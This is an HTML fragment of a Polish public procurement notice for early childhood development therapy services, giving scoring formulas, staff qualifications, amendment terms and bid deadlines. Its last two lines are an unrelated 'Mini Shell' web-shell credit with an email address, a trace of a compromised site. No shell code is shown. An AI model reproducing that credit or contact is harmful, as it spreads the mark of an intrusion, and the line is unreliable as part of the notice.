wykonania zamówienia zawarte są w opisie przedmiotu zamówienia oraz w projektowanych postanowieniach umowy będących załącznikami do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80340000-9 - Usługi edukacji specjalnej</p> <p class="mb-0">85121270-6 - Usługi psychiatryczne lub psychologiczne</p> <p class="mb-0">85142100-7 - Usługi fizjoterapii</p> <p class="mb-0">85312500-4 - Usługi rehabilitacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Punkty przyznawane za podane kryteria będą liczone według następujących wzorów:<br/>1)	Kryterium 1 - Cena (C) – dla wszystkich zadań częściowych<br/>W kryterium „Cena” można uzyskać maksymalnie 60 pkt. Oferta o najniższej cenie otrzyma 60 pkt, pozostałe proporcjonalnie mniej. <br/>Ostatecznie oferta otrzyma w tym kryterium zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikająca z działania: <br/>Liczba punktów = (Cmin/Cof) * 100 * waga, gdzie:<br/>- Cmin - najniższa cena spośród wszystkich ofert w danym zadaniu,<br/>- Cof - cena podana w ofercie w danym zadaniu.<br/>2)	Kryterium 2 – Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju (D) – dla wszystkich zadań częściowych <br/>W kryterium doświadczenie w pracy z dziećmi w wieku 0 - 7 lat w zakresie wczesnego wspomagania rozwoju (D) oceniane będzie doświadczenie osoby wskazanej przez Wykonawcę w pkt 2 formularza oferty, w pracy z dziećmi w wieku 0 – 7 lat w zakresie wczesnego wspomagania rozwoju. W tym kryterium można otrzymać maksymalnie 40 pkt. Oceniana będzie podana w Formularzu ofert w pkt 2 ilość lat doświadczenia (należy wskazywać zakończony rok pracy z dziećmi), odpowiednio dla zadania częściowego, <br/><br/>Ocena tego kryterium zostanie dokonana na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty zgodnie z poniższą tabelą:<br/>Doświadczenie w pracy z dziećmi w wieku 0-7 lat w zakresie wczesnego wspomagania rozwoju<br/>Od 0 do 1 roku doświadczenia - 5 pkt<br/>Od 2 do 5 lat doświadczenia - 10 pkt<br/>Od 6 do 9 lat doświadczenia - 20 pkt<br/>Od 10 do 13 lat doświadczenia - 30 pkt<br/>Powyżej 14 lat doświadczenia - 40 pkt<br/><br/>Wskazane w Formularzu oferty doświadczenie powinno pozwolić Zamawiającemu na ocenę oferty w sposób jednoznaczny i precyzyjny. Brak wypełnienia, niejednoznaczne, niepełne lub nieprawidłowe wypełnienie dokumentów mających wykazać doświadczenie obciąża Wykonawcę i skutkować będzie nie przyznaniem w tym kryterium punktów.<br/>Zamawiający wymaga dla każdej części minimum 1 osobę, która będzie skierowana do realizacji zamówienia w danym zadaniu. Wykonawca wskazuje tę osobę w Formularzu oferty w pkt 2 odpowiednio dla zadania częściowego w ilości zgodnej z wymaganą minimalną liczbą osób. Jeśli Wykonawca wskaże więcej niż 1 osobę do realizacji zamówienia w tym kryterium uzyska punkty wyliczone wg średniej arytmetycznej - punkty przyznane poszczególnym osobom zostaną zsumowane i podzielone przez liczbę wskazanych osób.<br/>Osoba wskazana do realizacji zamówienia (której doświadczenie podlega ocenie w ramach kryterium), będzie także oceniana zgodnie z pkt 6.2 ppkt 4 SWZ i ma obowiązek realizować zamówienie. Zastąpienie tej osoby jest możliwe w okolicznościach o których mowa w § 3 ust. 7 PPU tylko za zgodą Zamawiającego i pod warunkiem że nowa osoba posiada uprawnienia/doświadczenie nie mniejsze niż osoba zastępowana.<br/>W Formularzu oferty, odpowiednio dla zadania częściowego, należy wskazać wszystkie wymagane dane umożliwiające ocenę kryterium. Dane te nie podlegają uzupełnieniu. <br/>2. Za najkorzystniejszą zostanie uznana oferta Wykonawcy, który spełni wszystkie postawione w niniejszej SWZ warunki oraz uzyska łącznie największą liczbę punktów za wszystkie kryteria obliczoną wg wzoru: P = C + D, gdzie P - wynik oceny dla zadań 1 – 5. Pozostałe oferty zostaną sklasyfikowane zgodnie z ilością przyznanych punktów. Obliczenie punktacji, zgodnie z wyżej wskazanymi kryteriami, będą dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w pracy z dziecmi w wieku 0-7 lat w zakresie wczsnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> I. Zamawiający, na podstawie art. 112 ustawy Pzp określa następujące warunki udziału w postępowaniu:<br/>1.	Zdolność do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>2.	Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>3.	Sytuacja ekonomiczna lub finansowa<br/>Zamawiający nie określa warunku w powyższym zakresie.<br/>4.	Zdolność techniczna lub zawodowa<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże się dysponowaniem profesjonalną kadrą, która poprowadzi terapię objętą zadaniem, posiadającą odpowiednie kwalifikacje zawodowe i doświadczenie niezbędne do ich prawidłowej realizacji, tj.: <br/>1)	Dla zadania częściowego nr 1 - co najmniej 1 osobą, która ukończyła studia wyższe magisterskie w zakresie fizjoterapii lub rehabilitacji ruchowej albo studia wyższe magisterskie i studia podyplomowe lub kurs kwalifikacyjny w zakresie fizjoterapii lub rehabilitacji ruchowej;<br/>2)	Dla zadania częściowego nr 2 - co najmniej 1 osobą, która ukończyła studia wyższe magisterskie w zakresie psychologii, pedagogiki, fizjoterapii lub rehabilitacji ruchowej i kurs kwalifikacyjny z zakresu integracji sensorycznej, albo ukończyła studia wyższe magisterskie i studia podyplomowe z zakresu integracji sensorycznej;<br/>3)	Dla zadania częściowego nr 3 - co najmniej 1 osobą, która ukończyła jednolite studia magisterskie na kierunku psychologia, studia wyższe magisterskie na kierunku pedagogika lub pedagogika specjalna lub pedagogika przedszkolna lub pedagogika wczesnoszkolna oraz studia podyplomowe w zakresie logopedii albo jednolite studia magisterskie w zakresie logopedii;<br/>4)	Dla zadania częściowego nr 4 - co najmniej 1 osobą, która ukończyła jednolite studia magisterskie na kierunku psychologia, studia wyższe magisterskie na kierunku pedagogika lub pedagogika specjalna lub pedagogika przedszkolna lub pedagogika wczesnoszkolna oraz studia podyplomowe w zakresie logopedii albo jednolite studia magisterskie w zakresie logopedii;<br/>5)	Dla zadania częściowego nr 5 - co najmniej 1 osobą, która ukończyła studia wyższe magisterskie na kierunku pedagogika lub pedagogika specjalna lub pedagogika przedszkolna lub pedagogika wczesnoszkolna oraz studia podyplomowe w zakresie psychologii albo ukończyła jednolite studia magisterskie w zakresie psychologia.<br/>II. W celu wykazania spełniania powyższego warunku należy wykazać tę sama osobę/osoby której/których doświadczenie podlegać będzie ocenie (punktacji) w ramach kryterium oceny ofert, zgodnie z pkt 21.2 SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (określonej w pkt 6.2 ppkt 4) SWZ) Zamawiający żąda następujących podmiotowych środków dowodowych:<br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – dla każdego zadania częściowego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia wraz z ofertą przedmiotowych środków dowodowych <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z ofertą zobowiązany jest złożyć:<br/>1)	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie wskazanym przez Zamawiającego – wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, powyższe oświadczenie składa każdy z Wykonawców na zasadach określonych w pkt 10.5 SWZ.<br/>2)	Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby - wg wzoru stanowiącego załącznik nr 3 do SWZ – dotyczy Wykonawcy, który polega na zdolnościach podmiotów udostępniających zasoby na zasadach określonych w pkt 8.9 SWZ.<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia – wg wzoru stanowiącego załącznik nr 4 do SWZ lub inny podmiotowy środek dowodowy na zasadach określonych w pkt 8.3 SWZ.<br/>4)	Oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy – wg wzoru stanowiącego załącznik nr 5 do SWZ – dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia na zasadach określonych w pkt 10.6 SWZ.<br/>5)	Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy, Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów udostępniających zasoby. W przypadku wskazania przez Wykonawcę dostępności ww dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego dokumentów.<br/>6)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu udostępniającego zasoby, jeżeli w ich imieniu działa osoba, której umocowanie do reprezentacji nie wynika z dokumentów rejestrowych, o których mowa w ppkt 5;<br/>7)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia o którym mowa w pkt 10.1 i 10.2. SWZ. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy dołączyć odpowiednie pełnomocnictwo). W przypadku spółki cywilnej, jeśli z umowy tej spółki wynika sposób jej reprezentowania Wykonawcy mogą załączyć do oferty umowę spółki cywilnej. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem. <br/>2. Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie przesłanek określonych w pkt 7 SWZ natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z pkt 6.2 SWZ.<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (pkt 11.2 SWZ) składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełniania warunków udziału w postępowaniu, w zakresie w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu - wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają usługi do realizacji których te zdolności są wymagane. W takim przypadku, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - wg wzoru stanowiącego załącznik nr 5 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwości zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz wskazanych w Projektowanych postanowieniach umowy. <br/>2. Wszelkie uzupełnienia i zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności, chyba że w treści umowy określono inaczej.<br/>3. Wykonawca wnioskujący o zmianę umowy, przedłoży Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy. <br/>4. Dopuszcza się zmianę treści umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie dotyczącym:<br/>a)	zmiany ilości godzin, o której mowa w § 1 ust. 3 umowy;<br/>b)	zmiany miejsca świadczenia usług, o którym mowa w § 2 ust. 3 umowy;<br/>c)	zmiany osoby/osób wskazanej w § 5 ust. 5, na warunkach określonych w § 5 ust. 5 – 7 umowy;<br/>d)	zmiany terminu realizacji usług w przypadku wystąpienia siły wyższej;<br/>e)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy (np. dotyczących podatku VAT);<br/>f)	zmiany danych, które mogą wpływać na wystawianie i obieg faktur oraz ich księgowanie i rozliczanie dla celów podatkowych, takich jak nazwa firmy, numer konta, numer NIP;<br/>g)	konieczności wprowadzenia nieistotnej zmiany; istotność zmiany rozpatrywana będzie w odniesieniu do art. 454 ust. 2 ustawy Prawo zamówień publicznych.<br/>5. Dopuszcza się możliwość zmiany treści umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy, w zakresie dotyczącym zmiany wysokości wynagrodzenia należnego wykonawcy, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia, przy założeniach opisanych w § 8 ust. 4 PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma: https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawcę, wobec którego zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy Pzp, ponadto na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia<br/>2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (tj. Dz. U. z 2023 r. poz. 1497 ze zm.), zwanej w dalszej części niniejszego punktu „ustawą”:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy; <br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 z późn. zm.) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy; <br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 i 295) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com